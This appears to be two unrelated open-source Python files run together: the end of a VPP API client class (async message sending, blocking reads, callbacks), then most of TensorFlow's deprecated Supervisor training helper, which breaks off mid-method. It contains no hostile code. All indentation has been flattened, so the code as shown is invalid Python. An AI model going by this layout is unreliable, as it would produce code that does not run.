s = 'Return value: {!r}'.format(r)
if len(s) > 80:
s = s[:80] + "..."
self.logger.debug(s)
te = time.time()
self._add_stat(msgdef.name, (te - ts) * 1000)
return rl
def _call_vpp_async(self, i, msg, **kwargs):
"""Given a message, send the message and return the context.
msgdef - the message packing definition
i - the message type index
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
The reply message(s) will be delivered later to the registered callback.
The returned context will help with assigning which call
the reply belongs to.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
kwargs['client_index'] = 0
kwargs['_vl_msg_id'] = i
b = msg.pack(kwargs)
self.transport.write(b)
return context
def read_blocking(self, no_type_conversion=False, timeout=None):
"""Get next received message from transport within timeout, decoded.
Note that notifications have context zero
and are not put into receive queue (at least for socket transport),
use async_thread with registered callback for processing them.
If no message appears in the queue within timeout, return None.
Optionally, type conversion can be skipped,
as some of conversions are into less precise types.
When r is the return value of this, the caller can get message name as:
msgname = type(r).__name__
and context number (type long) as:
context = r.context
:param no_type_conversion: If false, type conversions are applied.
:type no_type_conversion: bool
:returns: Decoded message, or None if no message (within timeout).
:rtype: Whatever VPPType.unpack returns, depends on no_type_conversion.
:raises VppTransportShmemIOError if timed out.
"""
msg = self.transport.read(timeout=timeout)
if not msg:
return None
return self.decode_incoming_msg(msg, no_type_conversion)
def register_event_callback(self, callback):
"""Register a callback for async messages.
This will be called for async notifications in sync mode,
and all messages in async mode. In sync mode, replies to
requests will not come here.
callback is a fn(msg_type_name, msg_type) that will be
called when a message comes in. While this function is
executing, note that (a) you are in a background thread and
may wish to use threading.Lock to protect your datastructures,
and (b) message processing from VPP will stop (so if you take
a long while about it you may provoke reply timeouts or cause
VPP to fill the RX buffer). Passing None will disable the
callback.
"""
self.event_callback = callback
def thread_msg_handler(self):
"""Python thread calling the user registered message handler.
This is to emulate the old style event callback scheme. Modern
clients should provide their own thread to poll the event
queue.
"""
while True:
r = self.message_queue.get()
if r == "terminate event thread":
break
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def validate_message_table(self, namecrctable):
"""Take a dictionary of name_crc message names
and returns an array of missing messages"""
missing_table = []
for name_crc in namecrctable:
i = self.transport.get_msg_index(name_crc)
if i <= 0:
missing_table.append(name_crc)
return missing_table
def dump_message_table(self):
"""Return VPPs API message table as name_crc dictionary"""
return self.transport.message_table
def dump_message_table_filtered(self, msglist):
"""Return VPPs API message table as name_crc dictionary,
filtered by message name list."""
replies = [self.services[n]['reply'] for n in msglist]
message_table_filtered = {}
for name in msglist + replies:
for k,v in self.transport.message_table.items():
if k.startswith(name):
message_table_filtered[k] = v
break
return message_table_filtered
def __repr__(self):
return "<VPPApiClient apifiles=%s, testmode=%s, async_thread=%s, " \
"logger=%s, read_timeout=%s, use_socket=%s, " \
"server_address='%s'>" % (
self._apifiles, self.testmode, self.async_thread,
self.logger, self.read_timeout, self.use_socket,
self.server_address)
def details_iter(self, f, **kwargs):
cursor = 0
while True:
kwargs['cursor'] = cursor
rv, details = f(**kwargs)
for d in details:
yield d
if rv.retval == 0 or rv.retval != -165:
break
cursor = rv.cursor
|
supervisor.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training helper that checkpoints models and computes summaries."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import time
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary as _summary
from tensorflow.python.training import coordinator
from tensorflow.python.training import saver as saver_mod
from tensorflow.python.training import session_manager as session_manager_mod
from tensorflow.python.training import training_util
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
@tf_export("train.Supervisor")
class Supervisor(object):
"""A training helper that checkpoints models and computes summaries.
This class is deprecated. Please use
`tf.train.MonitoredTrainingSession` instead.
The Supervisor is a small wrapper around a `Coordinator`, a `Saver`,
and a `SessionManager` that takes care of common needs of TensorFlow
training programs.
#### Use for a single program
```python
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that will checkpoint the model in '/tmp/mydir'.
sv = Supervisor(logdir='/tmp/mydir')
# Get a TensorFlow session managed by the supervisor.
with sv.managed_session(FLAGS.master) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
Within the `with sv.managed_session()` block all variables in the graph have
been initialized. In addition, a few services have been started to
checkpoint the model and add summaries to the event log.
If the program crashes and is restarted, the managed session automatically
reinitialize variables from the most recent checkpoint.
The supervisor is notified of any exception raised by one of the services.
After an exception is raised, `should_stop()` returns `True`. In that case
the training loop should also stop. This is why the training loop has to
check for `sv.should_stop()`.
Exceptions that indicate that the training inputs have been exhausted,
`tf.errors.OutOfRangeError`, also cause `sv.should_stop()` to return `True`
but are not re-raised from the `with` block: they indicate a normal
termination.
#### Use for multiple replicas
To train with replicas you deploy the same program in a `Cluster`.
One of the tasks must be identified as the *chief*: the task that handles
initialization, checkpoints, summaries, and recovery. The other tasks
depend on the *chief* for these services.
The only change you have to do to the single program code is to indicate
if the program is running as the *chief*.
```python
# Choose a task as the chief. This could be based on server_def.task_index,
# or job_def.name, or job_def.tasks. It's entirely up to the end user.
# But there can be only one *chief*.
is_chief = (server_def.task_index == 0)
server = tf.train.Server(server_def)
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that uses log directory on a shared file system.
# Indicate if you are the 'chief'
sv = Supervisor(logdir='/shared_directory/...', is_chief=is_chief)
# Get a Session in a TensorFlow server on the cluster.
with sv.managed_session(server.target) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
In the *chief* task, the `Supervisor` works exactly as in the first example
above. In the other tasks `sv.managed_session()` waits for the Model to have
been initialized before returning a session to the training code. The
non-chief tasks depend on the chief task for initializing the model.
If one of the tasks crashes and restarts, `managed_session()`
checks if the Model is initialized. If yes, it just creates a session and
returns it to the training code that proceeds normally. If the model needs
to be initialized, the chief task takes care of reinitializing it; the other
tasks just wait for the model to have been initialized.
NOTE: This modified program still works fine as a single program.
The single program marks itself as the chief.
#### What `master` string to use
Whether you are running on your machine or in the cluster you can use the
following values for the --master flag:
* Specifying `''` requests an in-process session that does not use RPC.
* Specifying `'local'` requests a session that uses the RPC-based
"Master interface" to run TensorFlow programs. See
`tf.train.Server.create_local_server` for
details.
* Specifying `'grpc://hostname:port'` requests a session that uses
the RPC interface to a specific host, and also allows the in-process
master to access remote tensorflow workers. Often, it is
appropriate to pass `server.target` (for some `tf.train.Server`
named `server).
#### Advanced use
##### Launching additional services
`managed_session()` launches the Checkpoint and Summary services (threads).
If you need more services to run you can simply launch them in the block
controlled by `managed_session()`.
Example: Start a thread to print losses. We want this thread to run
every 60 seconds, so we launch it with `sv.loop()`.
```python
...
sv = Supervisor(logdir='/tmp/mydir')
with sv.managed_session(FLAGS.master) as sess:
sv.loop(60, print_loss, (sess, ))
while not sv.should_stop():
sess.run(my_train_op)
```
##### Launching fewer services
`managed_session()` launches the "summary" and "checkpoint" threads which use
either the optionally `summary_op` and `saver` passed to the constructor, or
default ones created automatically by the supervisor. If you want to run
your own summary and checkpointing logic, disable these services by passing
`None` to the `summary_op` and `saver` parameters.
Example: Create summaries manually every 100 steps in the chief.
```python
# Create a Supervisor with no automatic summaries.
sv = Supervisor(logdir='/tmp/mydir', is_chief=is_chief, summary_op=None)
# As summary_op was None, managed_session() does not start the
# summary thread.
with sv.managed_session(FLAGS.master) as sess:
for step in xrange(1000000):
if sv.should_stop():
break
if is_chief and step % 100 == 0:
# Create the summary every 100 chief steps.
sv.summary_computed(sess, sess.run(my_summary_op))
else:
# Train normally
sess.run(my_train_op)
```
##### Custom model initialization
`managed_session()` only supports initializing the model by running an
`init_op` or restoring from the latest checkpoint. If you have special
initialization needs, see how to specify a `local_init_op` when creating the
supervisor. You can also use the `SessionManager` directly to create a
session and check if it could be initialized automatically.
"""
# Value to pass for the 'ready_op', 'init_op', 'summary_op', 'saver',
# and 'global_step' parameters of Supervisor.__init__() to indicate that
# the default behavior should be used.
USE_DEFAULT = 0
@deprecation.deprecated(None,
"Please switch to tf.train.MonitoredTrainingSession")
def __init__(self,
graph=None,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT,
is_chief=True,
init_op=USE_DEFAULT,
init_feed_dict=None,
local_init_op=USE_DEFAULT,
logdir=None,
summary_op=USE_DEFAULT,
saver=USE_DEFAULT,
global_step=USE_DEFAULT,
save_summaries_secs=120,
save_model_secs=600,
recovery_wait_secs=30,
stop_grace_secs=120,
checkpoint_basename="model.ckpt",
session_manager=None,
summary_writer=USE_DEFAULT,
init_fn=None,
local_init_run_options=None):
"""Create a `Supervisor`.
Args:
graph: A `Graph`. The graph that the model will use. Defaults to the
default `Graph`. The supervisor may add operations to the graph before
creating a session, but the graph should not be modified by the caller
after passing it to the supervisor.
ready_op: 1-D string `Tensor`. This tensor is evaluated by supervisors in
`prepare_or_wait_for_session()` to check if the model is ready to use.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from `tf.report_uninitialized_variables()` If
`None`, the model is not checked for readiness.
ready_for_local_init_op: 1-D string `Tensor`. This tensor is evaluated by
supervisors in `prepare_or_wait_for_session()` to check if the model is
ready to run the local_init_op.
The model is considered ready if it returns an empty array. Defaults to
`None`. If `None`, the model is not checked for readiness before running
local_init_op.
is_chief: If True, create a chief supervisor in charge of initializing
and restoring the model. If False, create a supervisor that relies
on a chief supervisor for inits and restore.
init_op: `Operation`. Used by chief supervisors to initialize the model
when it can not be recovered. Defaults to an `Operation` that
initializes all global variables. If `None`, no initialization is done
automatically unless you pass a value for `init_fn`, see below.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
local_init_op: `Operation`. Used by all supervisors to run initializations
that should run for every new supervisor instance. By default these
are table initializers and initializers for local variables.
If `None`, no further per supervisor-instance initialization is
done automatically.
logdir: A string. Optional path to a directory where to checkpoint the
model and log events for the visualizer. Used by chief supervisors.
The directory will be created if it does not exist.
summary_op: An `Operation` that returns a Summary for the event logs.
Used by chief supervisors if a `logdir` was specified. Defaults to the
operation returned from summary.merge_all(). If `None`, summaries are
not computed automatically.
saver: A Saver object. Used by chief supervisors if a `logdir` was
specified. Defaults to the saved returned by Saver().
If `None`, the model is not saved automatically.
global_step: An integer Tensor of size 1 that counts steps. The value
from 'global_step' is used in summaries and checkpoint filenames.
Default to the op named 'global_step' in the graph if it exists, is of
rank 1, size 1, and of type tf.int32 or tf.int64. If `None` the global
step is not recorded in summaries and checkpoint files. Used by chief
supervisors if a `logdir` was specified.
save_summaries_secs: Number of seconds between the computation of
summaries for the event log. Defaults to 120 seconds. Pass 0 to
disable summaries.
save_model_secs: Number of seconds between the creation of model
checkpoints. Defaults to 600 seconds. Pass 0 to disable checkpoints.
recovery_wait_secs: Number of seconds between checks that the model
is ready. Used by supervisors when waiting for a chief supervisor
to initialize or restore the model. Defaults to 30 seconds.
stop_grace_secs: Grace period, in seconds, given to running threads to
stop when `stop()` is called. Defaults to 120 seconds.
checkpoint_basename: The basename for checkpoint saving.
session_manager: `SessionManager`, which manages Session creation and
recovery. If it is `None`, a default `SessionManager` will be created
with the set of arguments passed in for backwards compatibility.
summary_writer: `SummaryWriter` to use or `USE_DEFAULT`. Can be `None`
to indicate that no summaries should be written.
init_fn: Optional callable used to initialize the model. Called
after the optional `init_op` is called. The callable must accept one
argument, the session being initialized.
local_init_run_options: RunOptions to be passed as the SessionManager
local_init_run_options parameter.
Returns:
A `Supervisor`.
Raises:
RuntimeError: If called with eager execution enabled.
@compatibility(eager)
`Supervisor`s are not supported when eager execution is enabled.
@end_compatibility
"""
if context.executing_eagerly():
raise RuntimeError("Supervisors are compatible with eager execution.")
# Set default values of arguments.
if graph is None:
graph = ops.get_default_graph()
with graph.as_default():
self._init_ready_op(
ready_op=ready_op, ready_for_local_init_op=ready_for_local_init_op)
self._init_init_op(init_op=init_op, init_feed_dict=init_feed_dict)
self._init_local_init_op(local_init_op=local_init_op)
self._init_saver(saver=saver)
self._init_summary_op(summary_op=summary_op)
self._init_global_step(global_step=global_step)
self._graph = graph
self._meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True),
saver_def=self._saver.saver_def if self._saver else None)
self._is_chief = is_chief
self._coord = coordinator.Coordinator()
self._recovery_wait_secs = recovery_wait_secs
self._stop_grace_secs = stop_grace_secs
self._init_fn = init_fn
self._local_init_run_options = local_init_run_options
# Set all attributes related to checkpointing and writing events to None.
# Afterwards, set them appropriately for chief supervisors, as these are
# the only supervisors that can write checkpoints and events.
self._logdir = None
self._save_summaries_secs = None
self._save_model_secs = None
self._save_path = None
self._summary_writer = None
if self._is_chief:
self._logdir = logdir
self._save_summaries_secs = save_summaries_secs
self._save_model_secs = save_model_secs
if self._logdir:
self._save_path = os.path.join(self._logdir, checkpoint_basename)
if summary_writer is Supervisor.USE_DEFAULT:
if self._logdir:
self._summary_writer = _summary.FileWriter(self._logdir)
else:
self._summary_writer = summary_writer
self._graph_added_to_summary = False
self._init_session_manager(session_manager=session_manager)
self._verify_setup()
# The graph is not allowed to change anymore.
graph.finalize()
def _init_session_manager(self, session_manager=None):
if session_manager is None:
self._session_manager = session_manager_mod.SessionManager(
local_init_op=self._local_init_op,
ready_op=self._ready_op,
ready_for_local_init_op=self._ready_for_local_init_op,
graph=self._graph,
recovery_wait_secs=self._recovery_wait_secs,
local_init_run_options=self._local_init_run_options)
else:
self._session_manager = session_manager
def _get_first_op_from_collection(self, key):
"""Returns the first `Operation` from a collection.
Args:
key: A string collection key.
Returns:
The first Op found in a collection, or `None` if the collection is empty.
"""
try:
op_list = ops.get_collection(key)
if len(op_list) > 1:
logging.info("Found %d %s operations. Returning the first one.",
len(op_list), key)
if op_list:
return op_list[0]
except LookupError:
pass
return None
def _init_ready_op(self,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT):
"""Initializes ready_op.
Args:
ready_op: `Tensor` to check if the model is initialized.
If it's set to USE_DEFAULT, creates an op that checks all
the variables are initialized.
ready_for_local_init_op: `Tensor` to check if the model is ready to run
local_init_op.
If it's set to USE_DEFAULT, creates an op that checks all
the global variables are initialized.
"""
if ready_op is Supervisor.USE_DEFAULT:
ready_op = self._get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.report_uninitialized_variables()
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
self._ready_op = ready_op
# ready_for_local_init_op defaults to None for backward compatibility
if ready_for_local_init_op is Supervisor.USE_DEFAULT:
ready_for_local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.READY_FOR_LOCAL_INIT_OP)
self._ready_for_local_init_op = ready_for_local_init_op
def _init_init_op(self, init_op=USE_DEFAULT, init_feed_dict=None):
"""Initializes init_op.
Args:
init_op: `Operation` to initialize the variables. If set to USE_DEFAULT,
create an op that initializes all variables and tables.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
"""
if init_op is Supervisor.USE_DEFAULT:
init_op = self._get_first_op_from_collection(ops.GraphKeys.INIT_OP)
if init_op is None:
init_op = variables.global_variables_initializer()
ops.add_to_collection(ops.GraphKeys.INIT_OP, init_op)
self._init_op = init_op
self._init_feed_dict = init_feed_dict
def _init_local_init_op(self, local_init_op=USE_DEFAULT):
"""Initializes local_init_op.
Args:
local_init_op: `Operation` run for every new supervisor instance. If set
to USE_DEFAULT, use the first op from the GraphKeys.LOCAL_INIT_OP
collection. If the collection is empty, create an op that initializes
all local variables and all tables.
"""
if local_init_op is Supervisor.USE_DEFAULT:
local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [
variables.local_variables_initializer(),
lookup_ops.tables_initializer()
]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
self._local_init_op = local_init_op
def _init_saver(self, saver=USE_DEFAULT):
"""Initializes saver.
Args:
saver: A `Saver` object. If set to USE_DEFAULT, create one that
saves all the variables.
"""
if saver is Supervisor.USE_DEFAULT:
saver = self._get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is None and variables.global_variables():
saver = saver_mod.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
self._saver = saver
def _init_summary_op(self, summary_op=USE_DEFAULT):
"""Initializes summary_op.
Args:
summary_op: An Operation that returns a Summary for the event logs.
If set to USE_DEFAULT, create an op that merges all the summaries.
"""
if summary_op is Supervisor.USE_DEFAULT:
summary_op = self._get_first_op_from_collection(ops.GraphKeys.SUMMARY_OP)
if summary_op is None:
summary_op = _summary.merge_all()
if summary_op is not None:
ops.add_to_collection(ops.GraphKeys.SUMMARY_OP, summary_op)
self._summary_op = summary_op
def _init_global_step(self, global_step=USE_DEFAULT):
"""Initializes global_step.
Args:
global_step: An integer Tensor of size 1 that counts steps. If
set to USE_DEFAULT, creates global_step tensor.
"""
if global_step is Supervisor.USE_DEFAULT:
global_step = self._get_first_op_from_collection(
ops.GraphKeys.GLOBAL_STEP)
if global_step is None:
global_step = self._default_global_step_tensor()
if global_step is not None:
ops.add_to_collection(ops.GraphKeys.GLOBAL_STEP, global_step)
self._global_step = global_step
@property
def is_chief(self):
"""Return True if this is a chief supervisor.
Returns:
A bool.
"""
return self._is_chief
@property
def session_manager(self):
"""Return the SessionManager used by the Supervisor.
Returns:
A SessionManager object.
"""
return self._session_manager
@property
def coord(self):
"""Return the Coordinator used by the Supervisor.
The Coordinator can be useful if you want to run multiple threads
during your training.
Returns:
A Coordinator object.
"""
return self._coord
@property
def init_op(self):
"""Return the Init Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._init_op
@property
def init_feed_dict(self):
"""Return the feed dictionary used when evaluating the `init_op`.
Returns:
A feed dictionary or `None`.
"""
return self._init_feed_dict
@property
def ready_op(self):
"""Return the Ready Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def summary_writer(self):
"""Return the SummaryWriter used by the chief supervisor.
Returns:
A SummaryWriter.
"""
return self._summary_writer
@property
def summary_op(self):
"""Return the Summary Tensor used by the chief supervisor.
Returns:
A string Tensor for the summary or `None`.
"""
return self._summary_op
@property
def save_summaries_secs(self):
"""Return the delay between summary computations.
Returns:
A timestamp.
"""
return self._save_summaries_secs
@property
def global_step(self):
"""Return the global_step Tensor used by the supervisor.
Returns:
An integer Tensor for the global_step.
"""
return self._global_step
@property
def saver(self):
"""Return the Saver used by the supervisor.
Returns:
A Saver object.
"""
return self._saver
@property
def save_model_secs(self):
"""Return the delay between checkpoints.
Returns:
A timestamp.
"""
return self._save_model_secs
@property
def save_path(self):
"""Return the save path used by the supervisor.
Returns:
A string.
"""
return self._save_path
def _write_graph(self):
"""Writes graph_def to `logdir` and adds it to summary if applicable."""
assert self._is_chief
if self._logdir:
training_util.write_graph(self._graph.as_graph_def(add_shapes=True),
self._logdir, "graph.pbtxt")
if self._summary_writer and not self._graph_added_to_summary:
self._summary_writer.add_graph(self._graph)
self._summary_writer.add_meta_graph(self._meta_graph_def)
self._graph_added_to_summary = True
def start_standard_services(self, sess):
"""Start the standard services for 'sess'.
This starts services in the background. The services started depend
on the parameters to the constructor and may include:
- A Summary thread computing summaries every save_summaries_secs.
- A Checkpoint thread saving the model every save_model_secs.
- A StepCounter thread measure step time.
Args:
sess: A Session.
Returns:
A list of threads that are running the standard services. You can use
the Supervisor's Coordinator to join these threads with:
sv.coord.Join(<list of threads>)
Raises:
RuntimeError: If called with a non-chief Supervisor.
ValueError: If not `logdir` was passed to the constructor as the
services need a log directory.
"""
if not self._is_chief:
raise RuntimeError("Only chief supervisor can start standard services. "
"Because only chief supervisors can write events.")
if not self._logdir:
logging.warning("Standard services need a 'logdir' "
"passed to the SessionManager")
return
if self._global_step is not None and self._summary_writer:
# Only add the session log if we keep track of global step.
# TensorBoard cannot use START message for purging expired events
# if there is no step value.
current_step = training_util.global_step(sess, self._global_step)
self._summary_writer.add_session_log(
SessionLog(status=SessionLog.START),
current_step)
threads = []
if self._save_summaries_secs and self._summary_writer:
if self._summary_op is not None:
threads.append(SVSummaryThread(self, sess))
if self._global_step is not None:
threads.append(SVStepCounterThread(self, sess))
if self.saver and self._save_model_secs:
threads.append(SVTimerCheckpointThread(self, sess))
for t in threads:
t.start()
return threads
def prepare_or_wait_for_session(self, master="", config=None,
wait_for_checkpoint=False,
max_wait_secs=7200,
start_standard_services=True):
"""Make sure the model is ready to be used.
Create a session on 'master', recovering or initializing the model as
needed, or wait for a session to be ready. If running as the chief
and `start_standard_service` is set to True, also call the session
manager to start the standard services.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional ConfigProto proto used to configure the session,
which is passed as-is to create the session.
wait_for_checkpoint: Whether we should wait for the availability of a
checkpoint before creating Session. Defaults to False.
max_wait_secs: Maximum time to wait for the session to become available.
start_standard_services: Whether to start the standard services and the
queue runners.
Returns:
A Session object that can be used to drive the model.
"""
# For users who recreate the session with prepare_or_wait_for_session(), we
# need to clear the coordinator's stop_event so that threads managed by the
# coordinator can run.
self._coord.clear_stop()
if self._summary_writer:
self._summary_writer.reopen()
if self._is_chief:
sess = self._session_manager.prepare_session(
master, init_op=self.init_op, saver=self.saver,
checkpoint_dir=self._logdir, wait_for_checkpoint=wait_for_checkpoint,
max_wait_secs=max_wait_secs, config=config,
init_feed_dict=self._init_feed_dict, init_fn=self._init_fn)
self._write_graph()
if start_standard_services:
logging.info("Starting standard services.")
self.start_standard_services(sess)
else:
sess = self._session_manager.wait_for_session(master,
config=config,
max_wait_secs=max_wait_secs)
if start_standard_services:
logging.info("Starting queue runners.")
self.start_queue_runners(sess)
return sess
def start_queue_runners(self, sess, queue_runners=None):
"""Start threads for `QueueRunners`.
Note that the queue runners collected in the graph key `QUEUE_RUNNERS`
are already started automatically when you create a session with the
supervisor, so unless you have non-collected queue runners to start
you do not need to call this explicitly.
Args:
sess: A `Session`.
queue_runners: A list of `QueueRunners`. If not specified, we'll use the
list of queue runners gathered in the graph under the key
`GraphKeys.QUEUE_RUNNERS`.
Returns:
The list of threads started for the `QueueRunners`.
Raises:
RuntimeError: If called with eager execution enabled.
@compatibility(eager)
Queues are not compatible with eager execution. To ingest data when eager
execution is enabled, use the `tf.data` API.
@end_compatibility
"""
if context.executing_eagerly():
raise RuntimeError("Queues are not compatible with eager execution.")
if queue_runners is None:
queue_runners = self._graph.get_collection(ops.GraphKeys.QUEUE_RUNNERS)
threads = []
for qr in queue_runners:
threads.extend(qr.create_threads(sess, coord=self._coord, daemon=True,
start=True))
return threads
def loop(self, timer_interval_secs, target, args=None, kwargs=None):
"""Start a LooperThread that calls a function periodically.
If `timer_interval_secs` is None the thread calls `target(*args, **kwargs)`
repeatedly. Otherwise it calls it every `timer_interval_secs`
seconds. The thread terminates when a stop is requested.
The started thread is added to the list of threads managed by the supervisor
so it does not need to be passed to the `stop()` method.
Args:
timer_interval_secs: Number. Time boundaries at which to call `target`.
target: A callable object.
args: Optional arguments to pass to `target` when calling it.
kwargs: Optional keyword arguments to pass to `target` when calling it.
Returns:
The started thread.
"""
looper = coordinator.LooperThread(self._coord, timer_interval_secs,
target=target, args=args, kwargs=kwargs)
looper.start()
return looper
def stop(self,
threads=None,
close_summary_writer=True,
ignore_live_threads=False):
"""Stop the services and the coordinator.
This does not close the session.
Args:
threads: Optional list of threads to join with the coordinator. If
`None`, defaults to the threads running the standard services, the
threads started for `QueueRunners`, and the threads started by the
`loop()` method. To wait on additional threads, pass the
list in this parameter.
close_summary_writer: Whether to close the `summary_writer`. Defaults to
`True` if the summary writer was created by the supervisor, `False`
otherwise.
ignore_live_threads: If `True` ignores threads that remain running after
a grace period when joining threads via the coordinator, instead of
raising a RuntimeError.
"""
self._coord.request_stop()
try:
# coord.join() re-raises the first reported exception; the "finally"
# block ensures that we clean up whether or not an exception was
# reported.
self._coord.join(
threads,
stop_grace_period_secs=self._stop_grace_secs,
ignore_live_threads=ignore_live_threads)
finally:
# Close the writer last, in case one of the running threads was using it.
if close_summary_writer and self._summary_writer:
# Stop messages are not logged with event.step,
# since the session may have already terminated.
self._summary_writer.add_session_log(SessionLog(status=SessionLog.STOP))
self._summary_writer.close()
self._graph_added_to_summary = False
def request_stop(self, ex=None):
"""Request that the coordinator stop the threads.
See `Coordinator.request_stop()`.
Args:
ex: Optional `Exception`, or Python `exc_info` tuple as returned by
`sys.exc_info()`. If this is the first call to `request_stop()` the
corresponding exception is recorded and re-raised from `join()`.
"""
self._coord.request_stop(ex=ex)
def should_stop(self):
"""Check if the coordinator was told to stop.
See `Coordinator.should_stop()`.
Returns:
True if the coordinator was told to stop, False otherwise.
"""
return self._coord.should_stop()
def stop_on_exception(self):
"""Context handler to stop the supervisor when an exception is raised.
See `Coordinator.stop_on_exception()`.
Returns:
A context handler.
"""
return self._coord.stop_on_exception()
def wait_for_stop(self):
"""Block waiting for the coordinator to stop."""
self._coord.wait_for_stop()
def summary_computed(self, sess, summary, global_step=None):
"""Indicate that a summary was computed.
Args:
sess: A `Session` object.
summary: A Summary proto, or a string holding a serialized summary proto.
global_step: Int. global step this summary is associated with. If `None`,
it will try to fetch the current step.
Raises:
TypeError: if 'summary' is not a Summary proto or a string.
RuntimeError: if the Supervisor was created without a `logdir`.
"""
if not self._summary_writer:
raise RuntimeError("Writing a summary requires a summary writer.")
if global_step is None and self.global_step is not None:
global_step = training_util.global_step(sess, self.global_step)
self._summary_writer.add_summary(summary, global_step)
def _default_global_step_tensor(self):
"""Returns the global_step from the default graph.
Returns:
The global step `Tensor` or `None`.
"""
try:
gs = ops.get_default_graph().get_tensor_by_name("global_step:0")
if gs.dtype.base_dtype in [dtypes.int32, dtypes.int64]:
return gs
else:
logging.warning("Found 'global_step' is not an int type: %s", gs.dtype)
return None
except KeyError:
return None
def _verify_setup(self):
"""Check that all is good.
Raises:
ValueError: If something is not good.
"""
# Not running as chief means that replicas are used.
# In that case all Variables must have their device set.
if not self._is_chief:
for op in self._graph.get_operations():
if op.type in ["Variable", "VariableV2"] and not op.device:
raise ValueError("When using replicas, all Variables must have "
"their device set: %s" % op)
# pylint: disable=g-doc-return-or-yield,broad-except
@contextlib.contextmanager
def managed_session(self, master="", config=None,
start_standard_services=True,
close_summary_writer=True):
"""Returns a context manager for a managed session.
This context manager creates and automatically recovers a session. It
optionally starts the standard services that handle checkpoints and
summaries. It monitors exceptions raised from the `with` block or from the
services and stops the supervisor as needed.
The context manager is typically used as follows:
```python
def train():
sv = tf.train.Supervisor(...)
with sv.managed_session(<master>) as sess:
for step in xrange(..):
if sv.should_stop():
break
sess.run(<my training op>)
...do other things needed at each training step...
```
An exception raised from the `with` block or one of the service threads is
raised again when the block exits. This is done after stopping all threads
and closing the session. For example, an `AbortedError` exception, raised
in case of preemption of one of the workers in a distributed model, is
raised again when the block exits.
If you want to retry the training loop in case of preemption you can do it
as follows:
```python
def main(...):
while True
try:
train()
except tf.errors.Aborted:
pass
```
As a special case, exceptions used for control flow, such as
`OutOfRangeError` which reports that input queues are exhausted, are not
raised again from the `with` block: they indicate a clean termination of
the training loop and are considered normal termination.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional `ConfigProto` proto used to configure the session.
Passed as-is to create the session.
start_standard_services: Whether to start the standard services,
such as checkpoint, summary and step counter.
close_summary_writer: Whether to close the summary writer when
closing the session. Defaults to True.
Returns:
A context manager that yields a `Session` restored from the latest
checkpoint or initialized from scratch if not checkpoint exists. The
session is closed when the `with` block exits.
"""
try:
sess = self.prepare_or_wait_for_session(
master=master, config=config,
start_standard_services=start_standard_services)
yield sess
except Exception as e:
self.request_stop(e)
finally:
try:
# Request all the threads to stop and wait for them to do so. Any
# exception raised by the threads is raised again from stop().
# Passing stop_grace_period_secs is for blocked enqueue/dequeue
# threads which are not checking for `should_stop()`. They
# will be stopped when we close the session further down.
self.stop(close_summary_writer=close_summary_writer)
finally:
# Close the session to finish up all pending calls. We do not care
# about exceptions raised when closing. This takes care of
# blocked enqueue/dequeue calls.
try:
sess.close()
except Exception:
# Silently ignore exceptions raised by close().
pass
# pylint: enable=g-doc-return-or-yield,broad-except
class SVSummaryThread(coordinator.LooperThread):
"""A thread to save summaries on a timer."""
def __init__(self, sv, sess):
"""Create a SVSummaryThread.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVSummaryThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
if self._sv.global_step is not None:
summary_strs, global_step = self._sess.run([self._sv.summary_op,
self._sv.global_step])
else:
summary_strs = self._sess.run(self._sv.summary_op)
global_step = None
if self._sv.summary_writer:
logging.info("Recording summary at step %s.", global_step)
